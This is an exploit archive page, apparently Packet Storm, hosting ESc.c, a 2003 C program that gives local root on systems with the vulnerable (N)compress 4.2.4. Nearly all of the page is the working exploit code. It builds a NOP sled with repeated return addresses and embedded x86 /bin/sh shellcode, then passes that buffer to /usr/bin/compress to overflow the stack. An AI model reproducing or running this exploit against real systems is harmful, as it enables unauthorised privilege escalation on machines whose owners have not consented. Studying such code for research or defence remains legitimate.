what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ESc.c

ESc.c
Posted Apr 27, 2003
Authored by electronicsouls, Lunar Fault

(N)compress 4.2.4 local root exploit.

tags | local, root
SHA-256 | 8ad5fecf9ab689d4c57252919836ecd38d23f16efdaea8755879e04bdd2451c3
Download | Favorite | View

ESc.c

Change Mirror Download
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define VULN "/usr/bin/compress"
#define NOP 0x90909090
#define NOPLEN 500

/* This shellcode was taken from some exploit I dont know who wrote it */
const unsigned char linux_x86_exec_hellcode[] =
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
   "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
   "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
   "\xff\xff/bin/sh";

unsigned long get_sp(void)
{
   __asm__(" mov %esp, %eax");
}
void usage(char *prog)
{
   printf("<+> (N)compress 4.2.4 Exploit\n");
   printf("<+> By: Lunar Fault [ElectronicSouls]\n");
   printf("<+> Information System Advancement in Penetration (ISAP) Laboratories
\n");
   printf("<!> usage: %s [options]\n", prog);
   printf("\t\t-h  help\n");
   printf("\t\t-o <offset>     Example: 100\n");
   printf("\t\t-r <return>     Example: 0xbfffc680\n");
   printf("\t\t-s <size>       Example: 1056\n");
   exit(1);
}

int main(int argv, char *argc[]) {
   int i, c, ret, offset;
   long len;
   char *buffer, tmpbuf[10];

   offset = 0;
   len = 1056;
   ret = get_sp();
   ret = ret - 100;  /* Subtracting 100 from sp to bring the return somewhere in
 the NOP */

   if (argv > 1) {

      while ((c = getopt (argv, argc, "r:s:o:h"))!=EOF) {
         switch(c) {
            case 'r':
               ret = strtoll(optarg, NULL, 0);
               break;
            case 's':
               len = atoi(optarg);
               break;
            case 'o':
               offset = atoi(optarg);
               break;
            case 'h':
               usage(argc[0]);
         }
      }
   }
   buffer = (char *) malloc(len);
   ret = ret + offset;

   for (i=0;i<len;i+=4)
      *(long*) &buffer[i] = NOP;

   for (i=NOPLEN;i<len;i+=4)
      *(long*) &buffer[i] = ret;

   memcpy(buffer+NOPLEN, linux_x86_exec_hellcode, strlen(linux_x86_exec_hellcode
));

   printf("<+> (N)compress 4.2.4 Exploit\n");
   printf("<+> By: Lunar Fault [ElectronicSouls]\n");
   printf("<+> Information System Advancement in Penetration (ISAP) Laboratories
\n");
   printf("<*> Offset = %d\n", offset);
   printf("<*> Return = 0x%.8x\n", ret);
   printf("<*> Size = %d\n\n", len);
   execl(VULN, VULN, buffer, 0);

   return 0;
}


Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close